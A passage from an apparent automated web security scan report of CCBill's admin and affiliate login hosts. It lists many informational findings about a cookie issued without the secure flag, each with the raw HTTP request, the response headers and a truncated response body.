Set-Cookie: TSc23f25=a0a841a24f75aa5b53f35b9fcc455f667c73dbe3b95e9a8f4e1c810b; Path=/

(function() {
var lc_params = '';
var lc_lang = 'en';
var lc_skill = '0';

var lc = document.createElement('script'); lc.type = 'text/javascript'; lc.async = true;
var lc_src = ('
...[SNIP]...

7.38. https://admin.ccbill.com/js/loginJSTools.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://admin.ccbill.com
Path:   /js/loginJSTools.js

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /js/loginJSTools.js?17 HTTP/1.1
Host: admin.ccbill.com
Connection: keep-alive
Referer: https://admin.ccbill.com/loginMM.cgi
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CCBILL_REFERRER=700080; __utma=250776793.28934213.1306890612.1306890612.1310490247.2; __utmb=250776793.7.10.1310490247; __utmc=250776793; __utmz=250776793.1310490507.2.4.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ccbill%20vulnerability%20rewards; TSc23f25=a0a841a24f75aa5b53f35b9fcc455f667c73dbe3b95e9a8f4e1c810b

Response

HTTP/1.1 200 OK
Date: Tue, 12 Jul 2011 17:14:57 GMT
Last-Modified: Sat, 23 Oct 2010 00:04:46 GMT
ETag: "169041c-c9a-4933d81c06380"
Accept-Ranges: bytes
Content-Length: 3226
Keep-Alive: timeout=5, max=89
Connection: Keep-Alive
Content-Type: application/x-javascript
Set-Cookie: TSc23f25=a0a841a24f75aa5b53f35b9fcc455f667c73dbe3b95e9a8f4e1c810b; Path=/

/*
// File: loginJSTools.js - collection of utility functions for newSkin login page
// Author: Michael S.
// Date: 2/20/2009
*/

// hook function to call functions on page load
function initPage() {
...[SNIP]...

7.39. https://admin.ccbill.com/login.cgi  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://admin.ccbill.com
Path:   /login.cgi

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /login.cgi HTTP/1.1
Host: admin.ccbill.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CCBILL_REFERRER=700080; __utma=250776793.28934213.1306890612.1306890612.1310490247.2; __utmb=250776793.7.10.1310490247; __utmc=250776793; __utmz=250776793.1310490507.2.4.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ccbill%20vulnerability%20rewards; TSc23f25=a0a841a24f75aa5b53f35b9fcc455f667c73dbe3b95e9a8f4e1c810b

Response

HTTP/1.1 302 Found
Date: Tue, 12 Jul 2011 17:14:53 GMT
Location: loginMM.cgi
Content-Length: 195
Keep-Alive: timeout=5, max=96
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: TSc23f25=a0a841a24f75aa5b53f35b9fcc455f667c73dbe3b95e9a8f4e1c810b; Path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="loginMM.cgi">here</a>.</p>
</body></html>

7.40. https://admin.ccbill.com/loginIndex.cgi  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://admin.ccbill.com
Path:   /loginIndex.cgi

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /loginIndex.cgi HTTP/1.1
Host: admin.ccbill.com
Connection: keep-alive
Referer: https://admin.ccbill.com/loginMM.cgi
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CCBILL_REFERRER=700080; __utma=250776793.28934213.1306890612.1306890612.1310490247.2; __utmb=250776793.7.10.1310490247; __utmc=250776793; __utmz=250776793.1310490507.2.4.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ccbill%20vulnerability%20rewards; TSc23f25=a0a841a24f75aa5b53f35b9fcc455f667c73dbe3b95e9a8f4e1c810b

Response

HTTP/1.1 200 OK
Date: Tue, 12 Jul 2011 17:15:01 GMT
Keep-Alive: timeout=5, max=91
Connection: Keep-Alive
Content-Type: text/html; charset=ISO-8859-1
Set-Cookie: TSc23f25=a0a841a24f75aa5b53f35b9fcc455f667c73dbe3b95e9a8f4e1c810b; Path=/
Content-Length: 6480

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...

7.41. https://admin.ccbill.com/loginMM.cgi  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://admin.ccbill.com
Path:   /loginMM.cgi

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /loginMM.cgi HTTP/1.1
Host: admin.ccbill.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CCBILL_REFERRER=700080; __utma=250776793.28934213.1306890612.1306890612.1310490247.2; __utmb=250776793.7.10.1310490247; __utmc=250776793; __utmz=250776793.1310490507.2.4.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ccbill%20vulnerability%20rewards; TSc23f25=a0a841a24f75aa5b53f35b9fcc455f667c73dbe3b95e9a8f4e1c810b

Response

HTTP/1.1 200 OK
Date: Tue, 12 Jul 2011 17:14:54 GMT
Set-Cookie: JSession=; domain=ccbill.com; path=/; expires=Mon, 11-Jul-2011 17:14:56 GMT
Keep-Alive: timeout=5, max=93
Connection: Keep-Alive
Content-Type: text/html; charset=ISO-8859-1
Set-Cookie: TSc23f25=a0a841a24f75aa5b53f35b9fcc455f667c73dbe3b95e9a8f4e1c810b; Path=/
Content-Length: 18889

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<link rel=
...[SNIP]...

7.42. https://admin.ccbill.com/style/css/ccbill_style.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://admin.ccbill.com
Path:   /style/css/ccbill_style.css

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /style/css/ccbill_style.css HTTP/1.1
Host: admin.ccbill.com
Connection: keep-alive
Referer: https://admin.ccbill.com/loginMM.cgi
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CCBILL_REFERRER=700080; __utma=250776793.28934213.1306890612.1306890612.1310490247.2; __utmb=250776793.7.10.1310490247; __utmc=250776793; __utmz=250776793.1310490507.2.4.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ccbill%20vulnerability%20rewards; TSc23f25=a0a841a24f75aa5b53f35b9fcc455f667c73dbe3b95e9a8f4e1c810b

Response

HTTP/1.1 200 OK
Date: Tue, 12 Jul 2011 17:14:57 GMT
Last-Modified: Sat, 23 Oct 2010 00:05:00 GMT
ETag: "421253-677-4933d82960300"
Accept-Ranges: bytes
Content-Length: 1655
Keep-Alive: timeout=5, max=94
Connection: Keep-Alive
Content-Type: text/css
Set-Cookie: TSc23f25=a0a841a24f75aa5b53f35b9fcc455f667c73dbe3b95e9a8f4e1c810b; Path=/

/*Header Styles*/
a.links {
color: black !important;
text-decoration: none !important;
font-family: Verdana !important;
font-size: 10px !important;
}

a.links:hover {
text-decorati
...[SNIP]...

7.43. https://admin.ccbill.com/style/css/default_style.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://admin.ccbill.com
Path:   /style/css/default_style.css

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /style/css/default_style.css HTTP/1.1
Host: admin.ccbill.com
Connection: keep-alive
Referer: https://admin.ccbill.com/loginMM.cgi
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CCBILL_REFERRER=700080; __utma=250776793.28934213.1306890612.1306890612.1310490247.2; __utmb=250776793.7.10.1310490247; __utmc=250776793; __utmz=250776793.1310490507.2.4.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ccbill%20vulnerability%20rewards; TSc23f25=a0a841a24f75aa5b53f35b9fcc455f667c73dbe3b95e9a8f4e1c810b

Response

HTTP/1.1 200 OK
Date: Tue, 12 Jul 2011 17:14:57 GMT
Last-Modified: Fri, 05 Mar 2010 22:45:42 GMT
ETag: "4208d8-3347-4811579a51180"
Accept-Ranges: bytes
Content-Length: 13127
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/css
Set-Cookie: TSc23f25=a0a841a24f75aa5b53f35b9fcc455f667c73dbe3b95e9a8f4e1c810b; Path=/

/* CSS Document */

html {
overflow: auto;
}

body { font-family: Verdana; font-size: 11px; line-height: normal;}
a {font-size: 11px; font-family: Verdana, Arial, Helvetica, sans-serif; co
...[SNIP]...

7.44. https://admin.ccbill.com/style/css/images/text-bg.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://admin.ccbill.com
Path:   /style/css/images/text-bg.gif

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /style/css/images/text-bg.gif HTTP/1.1
Host: admin.ccbill.com
Connection: keep-alive
Referer: https://admin.ccbill.com/loginMM.cgi
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CCBILL_REFERRER=700080; __utma=250776793.28934213.1306890612.1306890612.1310490247.2; __utmb=250776793.7.10.1310490247; __utmc=250776793; __utmz=250776793.1310490507.2.4.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ccbill%20vulnerability%20rewards; TSc23f25=a0a841a24f75aa5b53f35b9fcc455f667c73dbe3b95e9a8f4e1c810b

Response

HTTP/1.1 404 Not Found
Date: Tue, 12 Jul 2011 17:15:16 GMT
Keep-Alive: timeout=5, max=88
Connection: Keep-Alive
Content-Type: text/html; charset=ISO-8859-1
Set-Cookie: TSc23f25=a0a841a24f75aa5b53f35b9fcc455f667c73dbe3b95e9a8f4e1c810b; Path=/
Content-Length: 6288

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<title></title>


<link rel="stylesheet" href="/style/css/default_style.css" type="text/css" />
<link rel="stylesheet" href="/sty
...[SNIP]...

7.45. https://admin.ccbill.com/style/css/password.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://admin.ccbill.com
Path:   /style/css/password.css

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /style/css/password.css HTTP/1.1
Host: admin.ccbill.com
Connection: keep-alive
Referer: https://admin.ccbill.com/loginMM.cgi
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CCBILL_REFERRER=700080; __utma=250776793.28934213.1306890612.1306890612.1310490247.2; __utmb=250776793.7.10.1310490247; __utmc=250776793; __utmz=250776793.1310490507.2.4.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ccbill%20vulnerability%20rewards; TSc23f25=a0a841a24f75aa5b53f35b9fcc455f667c73dbe3b95e9a8f4e1c810b

Response

HTTP/1.1 200 OK
Date: Tue, 12 Jul 2011 17:15:00 GMT
Last-Modified: Thu, 20 Aug 2009 00:01:36 GMT
ETag: "58035b-1050-4718774815800"
Accept-Ranges: bytes
Content-Length: 4176
Keep-Alive: timeout=5, max=85
Connection: Keep-Alive
Content-Type: text/css
Set-Cookie: TSc23f25=a0a841a24f75aa5b53f35b9fcc455f667c73dbe3b95e9a8f4e1c810b; Path=/

body { font-family: Verdana; font-size: 11px; }
a {font-size: 11px; font-family: Verdana, Arial, Helvetica, sans-serif; color: #1563A2; text-decoration: underline; }

.inputLostPass {
font-fa
...[SNIP]...

7.46. https://admin.ccbill.com/style/images/bg_img.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://admin.ccbill.com
Path:   /style/images/bg_img.jpg

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /style/images/bg_img.jpg HTTP/1.1
Host: admin.ccbill.com
Connection: keep-alive
Referer: https://admin.ccbill.com/loginMM.cgi
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CCBILL_REFERRER=700080; __utma=250776793.28934213.1306890612.1306890612.1310490247.2; __utmb=250776793.7.10.1310490247; __utmc=250776793; __utmz=250776793.1310490507.2.4.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ccbill%20vulnerability%20rewards; TSc23f25=a0a841a24f75aa5b53f35b9fcc455f667c73dbe3b95e9a8f4e1c810b

Response

HTTP/1.1 200 OK
Date: Tue, 12 Jul 2011 17:15:02 GMT
Last-Modified: Mon, 20 Jul 2009 22:43:51 GMT
ETag: "580394-31d-46f2adf35d7c0"
Accept-Ranges: bytes
Content-Length: 797
Keep-Alive: timeout=5, max=97
Connection: Keep-Alive
Content-Type: image/jpeg
Set-Cookie: TSc23f25=a0a841a24f75aa5b53f35b9fcc455f667c73dbe3b95e9a8f4e1c810b; Path=/

......JFIF.....H.H.....C...........    ...    .......

.

........................... ...C.............. ......F...................................
...[SNIP]...

7.47. https://admin.ccbill.com/style/images/ccbillLogo.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://admin.ccbill.com
Path:   /style/images/ccbillLogo.jpg

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /style/images/ccbillLogo.jpg HTTP/1.1
Host: admin.ccbill.com
Connection: keep-alive
Referer: https://admin.ccbill.com/loginMM.cgi
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CCBILL_REFERRER=700080; __utma=250776793.28934213.1306890612.1306890612.1310490247.2; __utmb=250776793.7.10.1310490247; __utmc=250776793; __utmz=250776793.1310490507.2.4.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ccbill%20vulnerability%20rewards; TSc23f25=a0a841a24f75aa5b53f35b9fcc455f667c73dbe3b95e9a8f4e1c810b

Response

HTTP/1.1 200 OK
Date: Tue, 12 Jul 2011 17:15:00 GMT
Last-Modified: Sat, 23 Oct 2010 00:05:04 GMT
ETag: "1679555-171c-4933d82d30c00"
Accept-Ranges: bytes
Content-Length: 5916
Keep-Alive: timeout=5, max=75
Connection: Keep-Alive
Content-Type: image/jpeg
Set-Cookie: TSc23f25=a0a841a24f75aa5b53f35b9fcc455f667c73dbe3b95e9a8f4e1c810b; Path=/

......JFIF.....H.H.....C...........
...
.    ..    ........................""""""""""...C.............. ! !!! !!!!!!!!"""""""""""""""......F...................................
...[SNIP]...

7.48. https://admin.ccbill.com/style/images/contactCCBillBtn.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://admin.ccbill.com
Path:   /style/images/contactCCBillBtn.png

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /style/images/contactCCBillBtn.png HTTP/1.1
Host: admin.ccbill.com
Connection: keep-alive
Referer: https://admin.ccbill.com/loginMM.cgi
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CCBILL_REFERRER=700080; __utma=250776793.28934213.1306890612.1306890612.1310490247.2; __utmb=250776793.7.10.1310490247; __utmc=250776793; __utmz=250776793.1310490507.2.4.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ccbill%20vulnerability%20rewards; TSc23f25=a0a841a24f75aa5b53f35b9fcc455f667c73dbe3b95e9a8f4e1c810b

Response

HTTP/1.1 200 OK
Date: Tue, 12 Jul 2011 17:15:05 GMT
Last-Modified: Wed, 29 Jul 2009 00:07:17 GMT
ETag: "1679087-913-46fccf8525740"
Accept-Ranges: bytes
Content-Length: 2323
Keep-Alive: timeout=5, max=70
Connection: Keep-Alive
Content-Type: image/png
Set-Cookie: TSc23f25=a0a841a24f75aa5b53f35b9fcc455f667c73dbe3b95e9a8f4e1c810b; Path=/

.PNG
.
...IHDR..............M......sBIT.....O....    pHYs...........~.....tEXtSoftware.Adobe FireworksO..N....tEXtXML:com.adobe.xmp.<?xpacket begin=" " id="W5M0MpCehiHzreSzNTczkc9d"?>
<x:xmpmeta xmln
...[SNIP]...

7.49. https://admin.ccbill.com/style/images/email_icon.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://admin.ccbill.com
Path:   /style/images/email_icon.png

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /style/images/email_icon.png HTTP/1.1
Host: admin.ccbill.com
Connection: keep-alive
Referer: https://admin.ccbill.com/loginMM.cgi
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CCBILL_REFERRER=700080; __utma=250776793.28934213.1306890612.1306890612.1310490247.2; __utmb=250776793.7.10.1310490247; __utmc=250776793; __utmz=250776793.1310490507.2.4.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ccbill%20vulnerability%20rewards; TSc23f25=a0a841a24f75aa5b53f35b9fcc455f667c73dbe3b95e9a8f4e1c810b

Response

HTTP/1.1 200 OK
Date: Tue, 12 Jul 2011 17:15:10 GMT
Last-Modified: Mon, 24 Aug 2009 20:31:51 GMT
ETag: "137b6e-2f2-471e91b965bc0"
Accept-Ranges: bytes
Content-Length: 754
Keep-Alive: timeout=5, max=68
Connection: Keep-Alive
Content-Type: image/png
Set-Cookie: TSc23f25=a0a841a24f75aa5b53f35b9fcc455f667c73dbe3b95e9a8f4e1c810b; Path=/

.PNG
.
...IHDR................a....gAMA....7.......tEXtSoftware.Adobe ImageReadyq.e<....IDAT8....k.a.......n....F..(FP...F.FT...ll....    .6*.Z.NP.5.">Q...]..1....d.1....H.......Q...p.......;}.......
...[SNIP]...

7.50. https://admin.ccbill.com/style/images/exclamation_icon.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://admin.ccbill.com
Path:   /style/images/exclamation_icon.png

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /style/images/exclamation_icon.png HTTP/1.1
Host: admin.ccbill.com
Connection: keep-alive
Referer: https://admin.ccbill.com/loginMM.cgi
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CCBILL_REFERRER=700080; __utma=250776793.28934213.1306890612.1306890612.1310490247.2; __utmb=250776793.7.10.1310490247; __utmc=250776793; __utmz=250776793.1310490507.2.4.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ccbill%20vulnerability%20rewards; TSc23f25=a0a841a24f75aa5b53f35b9fcc455f667c73dbe3b95e9a8f4e1c810b

Response

HTTP/1.1 200 OK
Date: Tue, 12 Jul 2011 17:15:05 GMT
Last-Modified: Tue, 28 Jul 2009 22:35:58 GMT
ETag: "40502-320-46fcbb1bf6f80"
Accept-Ranges: bytes
Content-Length: 800
Keep-Alive: timeout=5, max=90
Connection: Keep-Alive
Content-Type: image/png
Set-Cookie: TSc23f25=a0a841a24f75aa5b53f35b9fcc455f667c73dbe3b95e9a8f4e1c810b; Path=/

.PNG
.
...IHDR................a....sBIT....|.d....    pHYs............X....tEXtSoftware.Adobe FireworksO..N....tEXtCreation Time.01/22/09.......|IDAT8...KlLa....w.3=g.m..v:.R.m'..i.......VM,...+Q.H..
...[SNIP]...

7.51. https://admin.ccbill.com/style/images/s.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://admin.ccbill.com
Path:   /style/images/s.gif

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /style/images/s.gif HTTP/1.1
Host: admin.ccbill.com
Connection: keep-alive
Referer: https://admin.ccbill.com/loginMM.cgi
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CCBILL_REFERRER=700080; __utma=250776793.28934213.1306890612.1306890612.1310490247.2; __utmb=250776793.7.10.1310490247; __utmc=250776793; __utmz=250776793.1310490507.2.4.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ccbill%20vulnerability%20rewards; TSc23f25=a0a841a24f75aa5b53f35b9fcc455f667c73dbe3b95e9a8f4e1c810b

Response

HTTP/1.1 200 OK
Date: Tue, 12 Jul 2011 17:15:00 GMT
Last-Modified: Mon, 12 Jan 2009 22:39:35 GMT
ETag: "4047f-2b-46050c7f1b7c0"
Accept-Ranges: bytes
Content-Length: 43
Keep-Alive: timeout=5, max=91
Connection: Keep-Alive
Content-Type: image/gif
Set-Cookie: TSc23f25=a0a841a24f75aa5b53f35b9fcc455f667c73dbe3b95e9a8f4e1c810b; Path=/

GIF89a.............!.......,...........D..;

7.52. https://admin.ccbill.com/style/images/section_bg.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://admin.ccbill.com
Path:   /style/images/section_bg.png

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /style/images/section_bg.png HTTP/1.1
Host: admin.ccbill.com
Connection: keep-alive
Referer: https://admin.ccbill.com/loginMM.cgi
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CCBILL_REFERRER=700080; __utma=250776793.28934213.1306890612.1306890612.1310490247.2; __utmb=250776793.7.10.1310490247; __utmc=250776793; __utmz=250776793.1310490507.2.4.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ccbill%20vulnerability%20rewards; TSc23f25=a0a841a24f75aa5b53f35b9fcc455f667c73dbe3b95e9a8f4e1c810b

Response

HTTP/1.1 200 OK
Date: Tue, 12 Jul 2011 17:15:00 GMT
Last-Modified: Thu, 04 Dec 2008 21:48:04 GMT
ETag: "58041a-4fc-45d3f83e52d00"
Accept-Ranges: bytes
Content-Length: 1276
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: image/png
Set-Cookie: TSc23f25=a0a841a24f75aa5b53f35b9fcc455f667c73dbe3b95e9a8f4e1c810b; Path=/

.PNG
.
...IHDR..............T*=....sBIT.....O....    pHYs...........~.....tEXtCreation Time.10/30/08........tEXtSoftware.Adobe FireworksO..N....tEXtXML:com.adobe.xmp.<?xpacket begin=" " id="W5M0MpCeh
...[SNIP]...

7.53. https://admin.ccbill.com/style/images/warning_icon.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://admin.ccbill.com
Path:   /style/images/warning_icon.png

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /style/images/warning_icon.png HTTP/1.1
Host: admin.ccbill.com
Connection: keep-alive
Referer: https://admin.ccbill.com/loginMM.cgi
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CCBILL_REFERRER=700080; __utma=250776793.28934213.1306890612.1306890612.1310490247.2; __utmb=250776793.7.10.1310490247; __utmc=250776793; __utmz=250776793.1310490507.2.4.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ccbill%20vulnerability%20rewards; TSc23f25=a0a841a24f75aa5b53f35b9fcc455f667c73dbe3b95e9a8f4e1c810b

Response

HTTP/1.1 200 OK
Date: Tue, 12 Jul 2011 17:15:10 GMT
Last-Modified: Thu, 20 Aug 2009 00:04:21 GMT
ETag: "420983-c123-471877e570b40"
Accept-Ranges: bytes
Content-Length: 49443
Keep-Alive: timeout=5, max=87
Connection: Keep-Alive
Content-Type: image/png
Set-Cookie: TSc23f25=a0a841a24f75aa5b53f35b9fcc455f667c73dbe3b95e9a8f4e1c810b; Path=/

.PNG
.
...IHDR...............U^....sBIT....|.d....    pHYs...........~.....tEXtCreation Time.04/07/09..Cn....tEXtSoftware.Adobe FireworksO..N....prVWx....Q.0..`/.L..`...K..Ig.Q2.@).2@.d.......s..1._..
...[SNIP]...

7.54. https://affiliateadmin.ccbill.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://affiliateadmin.ccbill.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: affiliateadmin.ccbill.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
